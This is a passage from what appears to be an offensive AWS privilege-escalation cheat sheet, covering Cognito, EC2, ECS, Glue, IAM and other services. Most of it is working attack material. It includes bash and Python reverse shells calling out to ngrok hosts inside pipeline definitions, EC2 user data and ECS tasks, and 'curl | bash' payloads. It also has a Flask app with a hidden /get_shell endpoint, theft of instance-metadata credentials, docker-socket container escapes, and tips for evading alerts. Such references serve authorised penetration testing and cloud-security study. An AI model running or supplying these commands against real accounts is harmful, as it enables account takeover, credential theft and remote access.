roles if the attacker can access to any Cognito user.
cognito-idp:AdminConfirmSignUp
This permission allows verifying a signup. By default anyone can sign up in
Cognito applications; if that is left enabled, a user could create an account with any
data and verify it with this permission.
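For instance, a user could first self-register (sketch; the client id is a placeholder) and then confirm the account with the admin command shown below:
aws cognito-idp sign-up --client-id <client-id> \
    --username attacker --password <password> \
    --user-attributes Name=email,Value=attacker@example.com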
aws cognito-idp admin-confirm-sign-up \
--user-pool-id <value> \
--username <value>
Potential Impact: Indirect privesc to the identity pool IAM role for
authenticated users if you can register a new user. Indirect privesc to
other app functionalities being able to confirm any account.
cognito-idp:AdminCreateUser
This permission would allow an attacker to create a new user inside the user
pool. The new user is created as enabled, but will need to change its
password.
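A sketch of that call (pool id and temporary password are placeholders):
aws cognito-idp admin-create-user \
    --user-pool-id <user-pool-id> \
    --username attacker \
    --temporary-password <temporary-password>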
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users. Indirect privesc to other app functionalities being
able to create any user.
cognito-idp:AdminEnableUser
This permission can help in a very edge-case scenario where an attacker
found the credentials of a disabled user and needs to enable it again.
Potential Impact: Indirect privesc to the identity pool IAM role for
authenticated users and permissions of the user if the attacker had
credentials for a disabled user.
cognito-idp:AdminInitiateAuth ,
cognito-
idp:AdminRespondToAuthChallenge
This permission allows to login with the method
ADMIN_USER_PASSWORD_AUTH. For more information follow the
link.
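A sketch of that login flow (pool/client ids are placeholders; if a challenge is returned, answer it with admin-respond-to-auth-challenge):
aws cognito-idp admin-initiate-auth \
    --user-pool-id <user-pool-id> \
    --client-id <client-id> \
    --auth-flow ADMIN_USER_PASSWORD_AUTH \
    --auth-parameters USERNAME=<username>,PASSWORD=<password>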
cognito-idp:AdminSetUserPassword
This permission would allow an attacker to change the password of any
user, making him able to impersonate any user (that doesn't have MFA
enabled).
aws cognito-idp admin-set-user-password \
--user-pool-id <value> \
--username <value> \
--password <value> \
--permanent
Potential Impact: Direct privesc to potentially any user, so access to all the
groups each user is member of and access to the Identity Pool authenticated
IAM role.
cognito-idp:AdminSetUserSettings |
cognito-idp:SetUserMFAPreference |
cognito-idp:SetUserPoolMfaConfig |
cognito-idp:UpdateUserPool
AdminSetUserSettings: An attacker could potentially abuse this
permission to set a mobile phone under his control as SMS MFA of a user.
UpdateUserPool: It's also possible to update the user pool to change the
MFA policy. Check cli here.
cognito-
idp:AdminUpdateUserAttributes
An attacker with this permission could change the email, phone number
or any other attribute of a user under his control to try to obtain more
privileges in an underlying application. This allows changing an email or
phone number and setting it as verified.
aws cognito-idp admin-update-user-attributes \
--user-pool-id <value> \
--username <value> \
--user-attributes <value>
cognito-idp:CreateUserPoolClient |
cognito-idp:UpdateUserPoolClient
An attacker with this permission could create a new User Pool Client less
restricted than the already existing pool clients. For example, the new client
could allow any kind of authentication method, have no secret, have
token revocation disabled, allow tokens to be valid for a longer period...
The same can be done if, instead of creating a new client, an existing one
is modified.
In the command line (or the update one) you can see all the options, check
it!.
cognito-idp:CreateUserImportJob |
cognito-idp:StartUserImportJob
An attacker could abuse this permission to create users by uploading a CSV
with new users.
# Both options before will give you a URL where you can send
the CVS file with the users to create
curl -v -T "PATH_TO_CSV_FILE" \
-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
(In the case where you create a new import job you might also need the
iam:PassRole permission, I haven't tested it yet.)
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users. Indirect privesc to other app functionalities being
able to create any user.
cognito-idp:CreateIdentityProvider | cognito-idp:UpdateIdentityProvider
An attacker could create a new identity provider to then be able to login
through this provider.
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users. Indirect privesc to other app functionalities being
able to create any user.
TODO: cognito-sync:*
AWS - Datapipeline Privesc
datapipeline
For more info about datapipeline check:
aws-datapipeline-codepipeline-codebuild-and-codecommit.md
iam:PassRole , datapipeline:CreatePipeline , datapipeline:PutPipelineDefinition , datapipeline:ActivatePipeline
An attacker with the iam:PassRole , datapipeline:CreatePipeline ,
datapipeline:PutPipelineDefinition, and
datapipeline:ActivatePipeline permissions would be able to escalate
privileges by creating a pipeline and updating it to run an arbitrary
AWS CLI command or create other resources, either once or on an
interval with the permissions of the role that was passed in.
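A minimal sketch of that first call (the pipeline name/unique id are arbitrary):
aws datapipeline create-pipeline --name privesc_pipeline --unique-id privesc_pipeline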
Which will create an empty pipeline. The attacker then needs to update the
definition of the pipeline to tell it what to do, with a command like this:
{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >&
/dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}
Note that the role referenced by the ShellCommandActivity and Default objects
needs to be a role assumable by datapipeline.amazonaws.com and the
resourceRole of the Ec2Resource object needs to be a role assumable by
ec2.amazonaws.com with an EC2 instance profile.
Moreover, the EC2 instance will only have access to the role assumable by
the EC2 instance (so you can only steal that one).
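A sketch of the remaining calls, assuming the definition above is saved in /tmp/def.json and the pipeline id comes from the create-pipeline output:
aws datapipeline put-pipeline-definition \
    --pipeline-id <pipeline-id> \
    --pipeline-definition file:///tmp/def.json
aws datapipeline activate-pipeline --pipeline-id <pipeline-id>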
aws-directory-services-workdocs.md
ds:ResetUserPassword
This permission allows changing the password of any existing user in the
Active Directory.\ By default, the only existing user is Admin.
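A minimal sketch of the call (directory id and password are placeholders):
aws ds reset-user-password \
    --directory-id <directory-id> \
    --user-name Admin \
    --new-password 'Newpassword123!'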
You can then grant the user an AWS IAM role for when they login; this way an
AD user/group will have access over the AWS management console.
There isn't apparently any way to enable the application access URL, the
AWS Management Console access and grant the permission from the CLI.
aws-dynamodb-enum.md
dynamodb:BatchGetItem
An attacker with this permission will be able to get items from tables by
the primary key (you cannot just ask for all the data of the table). This
means that you need to know the primary keys (you can get them from
the table metadata with describe-table ).
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could
put here entries from 1 to 1000 to dump all those
}
}
]
}
}
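A sketch of the call using that file, assuming it is saved as /tmp/a.json:
aws dynamodb batch-get-item --request-items file:///tmp/a.json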
Potential Impact: Indirect privesc by locating sensitive information in the
table
dynamodb:GetItem
Similar to the previous permissions this one allows a potential attacker to
read values from just 1 table given the primary key of the entry to retrieve:
// With a.json
{
"Id" : {
"N": "205"
}
}
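A sketch of the call, assuming the key file is saved as /tmp/a.json:
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json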
You can also retrieve several entries at once (given their primary keys) with the transact-get-items method like:
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
dynamodb:Query
Similar to the previous permissions this one allows a potential attacker to
read values from just 1 table given the primary key of the entry to retrieve.
It allows to use a subset of comparisons, but the only comparison allowed
with the primary key (that must appear) is "EQ", so you cannot use a
comparison to get the whole DB in a request.
aws dynamodb query --table-name ProductCatalog --key-conditions
file:///tmp/a.json
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
dynamodb:Scan
You can use this permission to dump the entire table easily.
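A minimal sketch (table name is the one used in the previous examples):
aws dynamodb scan --table-name ProductCatalog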
dynamodb:PartiQLSelect
You can use this permission to dump the entire table easily.
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
but you need to specify the primary key with a value, so it isn't that useful.
dynamodb:ExportTableToPointInTime | (dynamodb:UpdateContinuousBackups)
This permission will allow an attacker to export the whole table to an S3
bucket of his choice:
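A sketch of the export call (table ARN and bucket are placeholders):
aws dynamodb export-table-to-point-in-time \
    --table-arn arn:aws:dynamodb:<region>:<account-id>:table/<tablename> \
    --s3-bucket <attacker-bucket>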
Note that for this to work the table needs to have point-in-time-recovery
enabled, you can check if the table has it with:
aws dynamodb describe-continuous-backups \
--table-name <tablename>
If it isn't enabled, you will need to enable it and for that you need the
dynamodb:UpdateContinuousBackups permission:
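A sketch of enabling it:
aws dynamodb update-continuous-backups \
    --table-name <tablename> \
    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true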
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
ec2:CreateSnapshot
Any AWS user possessing the EC2:CreateSnapshot permission can steal
the hashes of all domain users by creating a snapshot of the Domain
Controller, mounting it to an instance they control and exporting the
NTDS.dit and SYSTEM registry hive file for use with Impacket's
secretsdump project.
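A minimal sketch of the first step (volume id is a placeholder):
aws ec2 create-snapshot --volume-id <dc-volume-id> --description "DC snapshot"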
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
iam:PassRole , ec2:RunInstances
An attacker with the iam:PassRole and ec2:RunInstances permissions
can create a new EC2 instance that they will have operating system access
to and pass an existing EC2 instance profile to it. They can then login to
the instance and request the associated AWS keys from the EC2 instance
meta data, which gives them access to all the permissions that the
associated instance profile/service role has.
You can run a new instance using a created ssh key ( --key-name ) and
then ssh into it (if you want to create a new one you might need to have the
permission ec2:CreateKeyPair ).
You can run a new instance using a user data ( --user-data ) that will
send you a rev shell. You don't need to specify security group this way.
echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' >
/tmp/rev.sh
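A sketch of launching the instance with that user data and an existing instance profile (AMI, key and profile names are placeholders):
aws ec2 run-instances \
    --image-id <ami-id> \
    --instance-type t2.micro \
    --iam-instance-profile Name=<instance-profile-name> \
    --key-name <ssh-key-name> \
    --user-data file:///tmp/rev.sh \
    --count 1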
Privesc to ECS
With this set of permissions you could also create an EC2 instance and
register it inside an ECS cluster. This way, ECS services will be run
inside the EC2 instance where you have access and then you can penetrate
those services (docker containers) and steal the ECS roles attached to them.
To learn how to force ECS services to be run in this new EC2 instance
check:
aws-ecs-privesc.md
If the instance profile has a role and the attacker cannot remove it, there
is another workaround. He could find an instance profile without a role or
create a new one ( iam:CreateInstanceProfile ), add the role to that
instance profile (as previously discussed), and associate that instance
profile to a compromised instance:
Potential Impact: Direct privesc to a different EC2 role (you need to have
compromised an AWS EC2 instance and some extra permission or specific
instance profile status).
ec2:RequestSpotInstances , iam:PassRole
An attacker with the permissions
ec2:RequestSpotInstances and iam:PassRole can request a Spot
Instance with an EC2 Role attached and a rev shell in the user data.\
Once the instance is run, he can steal the IAM role.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
ec2:ModifyInstanceAttribute
An attacker with the ec2:ModifyInstanceAttribute permission can modify the
instances' attributes. Among them, he can change the user data, which
implies that he can make the instance run arbitrary data, which can be
used to get a rev shell in the EC2 instance.
Note that the attributes can only be modified while the instance is
stopped, so the permissions ec2:StopInstances and
ec2:StartInstances are also needed.
TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"
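A sketch of the remaining steps (instance id is a placeholder; the user data attribute must receive a base64-encoded value):
printf '%s' "$TEXT" | base64 > "$TEXT_PATH"
aws ec2 stop-instances --instance-ids <instance-id>
aws ec2 modify-instance-attribute \
    --instance-id <instance-id> \
    --attribute userData \
    --value file://$TEXT_PATH
aws ec2 start-instances --instance-ids <instance-id>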
ec2:CreateLaunchTemplateVersion , ec2:CreateLaunchTemplate , ec2:ModifyLaunchTemplate
An attacker with the permissions
ec2:CreateLaunchTemplateVersion , ec2:CreateLaunchTemplate and
ec2:ModifyLaunchTemplate can create a new Launch Template version
with a rev shell in the user data and any EC2 IAM Role on it, change the
default version, and any Autoscaler group using that Launch Template
that is configured to use the latest or the default version will re-run the
instances using that template and will execute the rev shell.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
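A sketch of the template calls (template id, version number and instance profile name are placeholders):
aws ec2 create-launch-template-version \
    --launch-template-id <template-id> \
    --source-version 1 \
    --launch-template-data "{\"UserData\": \"$REV\", \"IamInstanceProfile\": {\"Name\": \"<instance-profile-name>\"}}"
aws ec2 modify-launch-template \
    --launch-template-id <template-id> \
    --default-version <new-version-number>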
autoscaling:CreateLaunchConfiguration , autoscaling:CreateAutoScalingGroup , iam:PassRole
An attacker with the permissions
autoscaling:CreateLaunchConfiguration , autoscaling:CreateAutoScalingGroup
and iam:PassRole can create a Launch Configuration with an IAM role and
a rev shell in the user data, then create an Autoscaling Group from that
configuration and wait for the instances to run the rev shell to steal the
attached IAM role.
ec2-instance-connect:SendSSHPublicKey
An attacker with the permission ec2-instance-connect:SendSSHPublicKey
can push a temporary SSH public key to a user of a running instance and
use it to SSH into it.
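A sketch of pushing a key and connecting (instance id, OS user and AZ are placeholders):
aws ec2-instance-connect send-ssh-public-key \
    --instance-id <instance-id> \
    --instance-os-user ec2-user \
    --availability-zone <az> \
    --ssh-public-key file://mykey.pub
ssh -i mykey ec2-user@<instance-ip>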
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances.
ec2-instance-connect:SendSerialConsoleSSHPublicKey
An attacker with the permission
ec2-instance-connect:SendSerialConsoleSSHPublicKey can push an SSH
public key to the serial console of a running instance and connect to it
over the serial console.
In order to connect to the serial port you also need to know the username
and password of a user inside the machine.
This way isn't that useful to privesc as you need to know a username and
password to exploit it.
aws-ecs-ecr-and-eks-enum.md
ecr:GetAuthorizationToken , ecr:BatchCheckLayerAvailability , ecr:CompleteLayerUpload , ecr:InitiateLayerUpload , ecr:PutImage , ecr:UploadLayerPart
An attacker with all those permissions can login to ECR and upload
images. This can be useful to escalate privileges to other environments
where those images are being used.
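A sketch of the push, assuming docker is available locally and the target repo already exists:
aws ecr get-login-password --region <region> | docker login --username AWS --password-stdin <account-id>.dkr.ecr.<region>.amazonaws.com
docker tag backdoored-image:latest <account-id>.dkr.ecr.<region>.amazonaws.com/<repo>:latest
docker push <account-id>.dkr.ecr.<region>.amazonaws.com/<repo>:latest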
aws-ecs-ecr-and-eks-enum.md
Privesc to node
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
But moreover, the EC2 nodes use docker to run the ECS tasks, so if you can escape to
the node or access the docker socket, you can check which other
containers are being run, and even get inside of them and steal the IAM
roles attached to them.
Furthermore, the EC2 instance role will usually have enough permissions
to update the container instance state of the EC2 instances being used as
nodes inside the cluster. An attacker could modify the state of an instance
to DRAINING, then ECS will remove all the tasks from it and the ones
being run as REPLICA will be run in a different instance, potentially
inside the attacker's instance so he can steal their IAM roles and potentially
sensitive info from inside the container.
The same technique can be done by deregistering the EC2 instance from
the cluster. This is potentially less stealthy but it will force the tasks to be
run in other instances:
# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...
# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
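Assuming the stolen node role also allows the higher-level state-change actions, a sketch of both approaches could be:
# Set a victim container instance to DRAINING so its tasks get rescheduled
aws ecs update-container-instances-state \
    --cluster <cluster-name> \
    --container-instances <container-instance-id> \
    --status DRAINING
# Or deregister it from the cluster (less stealthy)
aws ecs deregister-container-instance \
    --cluster <cluster-name> \
    --container-instance <container-instance-id> \
    --force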
iam:PassRole ,
ecs:RegisterTaskDefinition ,
ecs:RunTask
An attacker abusing the iam:PassRole , ecs:RegisterTaskDefinition and
ecs:RunTask permissions in ECS can generate a new task definition with a
malicious container that steals the metadata credentials and run it.
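A sketch of how this could look (cluster, role ARN and the rev shell endpoint are placeholders):
aws ecs register-task-definition \
    --family exfil_creds \
    --task-role-arn <arn-of-role-to-steal> \
    --requires-compatibilities EC2 \
    --container-definitions '[{"name":"exfil_creds","image":"python:latest","memory":128,"entryPoint":["sh","-c"],"command":["/bin/bash -c \"bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1\""]}]'
aws ecs run-task \
    --cluster <cluster-name> \
    --launch-type EC2 \
    --task-definition exfil_creds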
iam:PassRole ,
ecs:RegisterTaskDefinition ,
ecs:StartTask
Just like in the previous example an attacker abusing the iam:PassRole ,
ecs:RegisterTaskDefinition , ecs:StartTask permissions in ECS can
generate a new task definition with a malicious container that steals the
metadata credentials and run it.\ However, in this case, a container instance
to run the malicious task definition needs to be specified.
iam:PassRole , ecs:RegisterTaskDefinition , ( ecs:UpdateService|ecs:CreateService )
Just like in the previous example an attacker abusing the iam:PassRole ,
ecs:RegisterTaskDefinition , ecs:UpdateService or
ecs:CreateService permissions in ECS can generate a new task
definition with a malicious container that steals the metadata credentials
and run it by creating a new service with at least 1 task running.
ecs:RegisterTaskDefinition , (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
This scenario is like the previous ones but without the iam:PassRole
permission, so the attacker cannot attach a new IAM role to the task;
however, running an arbitrary container (like the one below, which mounts the
docker socket) still lets him escape to the node and steal the roles of the
instance and of other containers running there.
This attack is only possible if the ECS cluster is using EC2 instances and
not Fargate.
printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >&
/dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json
printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json
ecs:ExecuteCommand , ecs:DescribeTasks , (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
An attacker with the ecs:ExecuteCommand , ecs:DescribeTasks permissions can
execute commands inside a running container and exfiltrate the IAM role
attached to it (you need the describe permissions because it's necessary to
run aws ecs execute-command ).\ However, in order to do that, the
container instance needs to be running the ExecuteCommand agent (which
by default isn't).
execute-command [...]
enable-execute-command [...]
You can find examples of those options in previous ECS privesc sections.
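A sketch of the exec call itself (cluster, task and container names are placeholders):
aws ecs execute-command \
    --cluster <cluster-name> \
    --task <task-id> \
    --container <container-name> \
    --interactive \
    --command "sh"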
aws-ssm-privesc.md
iam:PassRole , ec2:RunInstances
Check in the ec2 privesc page how you can abuse these permissions to
privesc to ECS:
aws-ec2-privesc.md
?ecs:RegisterContainerInstance
TODO: Is it possible to register an instance from a different AWS account
so tasks are run under machines controlled by the attacker??
References
https://ruse.tech/blogs/ecs-attack-methods
aws-efs-enum.md
elasticfilesystem:DeleteFileSystemPolicy | elasticfilesystem:PutFileSystemPolicy
With any of those permissions an attacker can change the file system
policy to give himself access to it, or just delete it so the default access is
granted.
To change it:
aws efs put-file-system-policy --file-system-id <fs-id> --
policy file:///tmp/policy.json
elasticfilesystem:CreateMountTarget
If an attacker is inside a subnetwork where no mount target of the
EFS exists, he could just create one in his subnet with this privilege:
# You need to indicate security groups that will grant the user
access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>
elasticfilesystem:ModifyMountTargetSecurityGroups
In a scenario where an attacker finds that the EFS has a mount target in his
subnetwork but no security group is allowing the traffic, he could just
change that by modifying the selected security groups:
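A sketch of the calls (the chosen security group must allow the attacker to reach port 2049):
aws efs describe-mount-targets --file-system-id <fs-id>
aws efs modify-mount-target-security-groups \
    --mount-target-id <mount-target-id> \
    --security-groups <sg-id>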
aws-elastic-beanstalk-enum.md
elasticbeanstalk:CreateApplication , elasticbeanstalk:CreateEnvironment , elasticbeanstalk:CreateApplicationVersion , elasticbeanstalk:UpdateEnvironment , iam:PassRole , and more...
The mentioned permissions plus several S3 , EC2 , cloudformation and autoscaling
permissions are needed to create a Beanstalk application from scratch and
deploy code in it (which will run with the instance profile role passed).
zip -r MyApp.zip .
elasticbeanstalk:CreateApplicationVersion , elasticbeanstalk:UpdateEnvironment , cloudformation:GetTemplate , cloudformation:DescribeStackResources , cloudformation:DescribeStackResource , autoscaling:DescribeAutoScalingGroups , autoscaling:SuspendProcesses , autoscaling:ResumeProcesses
First of all you need to create a legit Beanstalk environment with the code
you would like to run in the victim's environment following the previous steps.
Potentially a simple zip containing these 2 files:
application.py
from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')

@application.route("/")
def index():
    return jsonify('Welcome!')

@application.route("/get_shell")
def search():
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')

if __name__ == "__main__":
    application.run()
requirements.txt
click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1
Once you have your own Beanstalk env running your rev shell, it's time
to migrate it to the victim's env. To do so you need to update the Bucket
Policy of your beanstalk S3 bucket so the victim can access it (Note that
this will open the Bucket to EVERYONE):
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-
947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-
947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-
1-947247140022"
}
]
}
# To get your rev shell just access the exposed web URL with
params such as:
http://myenv.eba-ankaia7k.us-east-
1.elasticbeanstalk.com/get_shell?
host=0.tcp.eu.ngrok.io&port=13528
aws-emr-enum.md
iam:PassRole ,
elasticmapreduce:RunJobFlow
An attacker with these permissions can run a new EMR cluster attaching
EC2 roles and try to steal its credentials.\ Note that in order to do this you
would need to know some ssh priv key imported in the account or to
import one, and be able to open port 22 in the master node (you might be
able to do this with the attributes EmrManagedMasterSecurityGroup and/or
ServiceAccessSecurityGroup inside --ec2-attributes ).
# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key
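A sketch of launching the cluster with that key and attacker-chosen roles (role/profile names, release label and security group are placeholders):
aws emr create-cluster \
    --name privesc-cluster \
    --release-label emr-6.9.0 \
    --instance-count 1 \
    --instance-type m5.xlarge \
    --service-role <emr-service-role> \
    --ec2-attributes KeyName=privesc,InstanceProfile=<ec2-instance-profile-to-steal>,EmrManagedMasterSecurityGroup=<sg-allowing-ssh>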
elasticmapreduce:OpenEditorInConsole
Just with this permission an attacker will be able to access the Jupyter
Notebook and steal the IAM role associated to it.\ The URL of the
notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-
1.amazonaws.com/<notebook-id>/lab/
Even if you attach an IAM role to the notebook instance, in my tests I
noticed that I was able to steal AWS managed credentials and not creds
related to the attached IAM role.
Now the attacker would just need to SSH into the development endpoint
to access the roles credentials.
# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest
glue:UpdateDevEndpoint ,
( glue:GetDevEndpoint |
glue:GetDevEndpoints )
An attacker with the glue:UpdateDevEndpoint permission would be able
to update the associated SSH public key of an existing Glue
development endpoint, to then SSH into it and have access to the
permissions the attached role has access to.
# Change public key to connect
aws glue update-dev-endpoint --endpoint-name target_endpoint \
    --public-key file:///path/to/my/public/ssh/key.pub
Now the attacker would just need to SSH into the development endpoint
to access the roles credentials. The AWS API should be accessed directly
from the new instance to avoid triggering alerts.
iam:PassRole , ( glue:CreateJob |
glue:UpdateJob ),
( glue:StartJobRun |
glue:CreateTrigger )
An attacker with those permissions can create/update a job attaching any
glue service account and start it. The job can execute arbitrary python
code, so a reverse shell can be obtained and used to steal the IAM
credentials of the attached role.
# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl
http://169.254.169.254/latest/meta-data/iam/security-
credentials/dummy
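A sketch of creating and launching such a job, assuming the script above was uploaded to S3 (names and ARNs are placeholders):
aws glue create-job \
    --name privesc-job \
    --role <glue-role-arn> \
    --command '{"Name": "pythonshell", "PythonVersion": "3", "ScriptLocation": "s3://<bucket>/rev.py"}'
aws glue start-job-run --job-name privesc-job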
glue:UpdateJob
Just with the update permission an attacker could steal the IAM Credentials
of the already attached role.
aws-iam-and-sts-enum
iam:CreatePolicyVersion
An attacker with the iam:CreatePolicyVersion permission can create a
new version of an IAM policy that they have access to. This allows them
to define their own custom permissions. When creating a new policy
version, it needs to be set as the default version to take effect, which you
would think would require the iam:SetDefaultPolicyVersion permission,
but when creating a new policy version, it is possible to include a flag
( --set-as-default ) that will automatically make it the new default version
and that doesn't require the iam:SetDefaultPolicyVersion
permission to use.
# Exploitation
aws iam create-policy-version --policy-arn <target_policy_arn> \
    --policy-document file:///path/to/administrator/policy.json \
    --set-as-default
iam:SetDefaultPolicyVersion
An attacker with the iam:SetDefaultPolicyVersion permission may be
able to escalate privileges through existing policy versions that are not
currently in use. If a policy that they have access to has versions that are
not the default, they would be able to change the default version to any
other existing version.
If the policy whose version you are modifying is the same one that is
granting the attacker the SetDefaultPolicyVersion permission, and the
new version doesn't grant that permission, the attacker won't be able to
return the policy to its original state.
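A minimal sketch of the call:
aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2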
Where "v2" is the policy version with the most privileges available.
iam:CreateAccessKey
An attacker with the iam:CreateAccessKey permission on other users can
create an access key ID and secret access key belonging to another user
in the AWS environment, if they don’t already have two sets associated
with them (which best practice says they shouldn’t).
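A minimal sketch (target username is a placeholder):
aws iam create-access-key --user-name <target_user>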
iam:CreateLoginProfile
An attacker with the iam:CreateLoginProfile permission on other users
can create a password to use to login to the AWS console on any user
that does not already have a login profile setup.
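A minimal sketch (username and password are placeholders):
aws iam create-login-profile --user-name <target_user> --password 'Newpassword123!' --no-password-reset-required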
iam:UpdateLoginProfile
An attacker with the iam:UpdateLoginProfile permission on other users
can change the password used to login to the AWS console on any user
that already has a login profile setup.
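A minimal sketch (username and password are placeholders):
aws iam update-login-profile --user-name <target_user> --password 'Newpassword123!' --no-password-reset-required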
iam:AttachUserPolicy
An attacker with the iam:AttachUserPolicy permission can escalate
privileges by attaching a policy to a user that they have access to, adding
the permissions of that policy to the attacker.
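A minimal sketch, attaching an AWS managed admin policy to your own user:
aws iam attach-user-policy --user-name <your_username> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess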
iam:AttachGroupPolicy
An attacker with the iam:AttachGroupPolicy permission can escalate
privileges by attaching a policy to a group that they are a part of, adding
the permissions of that policy to the attacker.
iam:AttachRolePolicy ,
sts:AssumeRole
An attacker with the iam:AttachRolePolicy permission can escalate
privileges by attaching a policy to a role that they have access to, adding
the permissions of that policy to the attacker.
Where the role is a role that the current user can temporarily assume with
sts:AssumeRole .
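A minimal sketch (role name/ARN are placeholders):
aws iam attach-role-policy --role-name <assumable_role> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws sts assume-role --role-arn <assumable_role_arn> --role-session-name privesc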
iam:PutUserPolicy
An attacker with the iam:PutUserPolicy permission can escalate
privileges by creating or updating an inline policy for a user that they
have access to, adding the permissions of that policy to the attacker.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}
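A minimal sketch, assuming the policy above is saved as /tmp/policy.json:
aws iam put-user-policy --user-name <your_username> --policy-name privesc --policy-document file:///tmp/policy.json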
iam:PutGroupPolicy
An attacker with the iam:PutGroupPolicy permission can escalate
privileges by creating or updating an inline policy for a group that they
are a part of, adding the permissions of that policy to the attacker.
iam:PutRolePolicy , sts:AssumeRole
An attacker with the iam:PutRolePolicy permission can escalate
privileges by creating or updating an inline policy for a role that they
have access to, adding the permissions of that policy to the attacker.
Where the role is a role that the current user can temporarily assume with
sts:AssumeRole .
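A minimal sketch, reusing the same policy document as before:
aws iam put-role-policy --role-name <assumable_role> --policy-name privesc --policy-document file:///tmp/policy.json
aws sts assume-role --role-arn <assumable_role_arn> --role-session-name privesc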
iam:AddUserToGroup
An attacker with the iam:AddUserToGroup permission can use it to add
themselves to an existing IAM Group in the AWS account.
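A minimal sketch (group and username are placeholders):
aws iam add-user-to-group --group-name <target_group> --user-name <your_username>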
iam:UpdateAssumeRolePolicy ,
